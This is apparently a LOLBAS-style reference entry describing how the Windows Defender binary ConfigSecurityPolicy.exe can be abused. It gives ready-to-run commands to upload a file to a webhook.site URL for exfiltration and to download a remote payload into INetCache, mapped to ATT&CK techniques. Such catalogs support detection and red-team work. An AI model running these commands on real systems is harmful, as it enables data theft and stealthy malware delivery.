.. /ConfigSecurityPolicy.exe

Star

Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.

• https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads
• https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads
• https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor
• https://twitter.com/NtSetDefault/status/1302589153570365440?s=20

Upload

1. Upload file, credentials or data exfiltration in general

   ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile

   Use case

   Upload file

   Privileges required

   User

   Operating systems

   Windows 10

   ATT&CK® technique

   T1567

Download

1. It will download a remote payload and place it in INetCache.

   ConfigSecurityPolicy.exe https://example.com/payload

   Use case

   Downloads payload from remote server

   Privileges required

   User

   Operating systems

   Windows 10, Windows 11

   ATT&CK® technique

   T1105

   Tags

   Download: INetCache

   INetCache downloaders typically store files in a randomly-named folder under %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE, having added [1] or a higher number between the file's name and its extension.
   If you downloaded a file named XYZ.exe, the full path of the downloaded file can be obtained by executing the following command:
   cmd.exe /c "where /r %LOCALAPPDATA%\Microsoft\Windows\INetCache XYZ*"